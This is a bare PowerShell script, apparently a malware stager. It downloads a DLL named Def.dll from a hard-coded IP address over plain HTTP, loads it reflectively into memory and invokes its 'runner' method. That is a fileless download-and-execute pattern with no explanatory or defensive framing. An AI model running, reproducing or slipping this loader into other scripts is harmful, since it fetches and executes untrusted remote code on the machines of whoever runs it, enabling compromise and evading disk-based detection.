$data = (New-Object System.Net.WebClient).DownloadData('http://15.160.116.14/Def.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)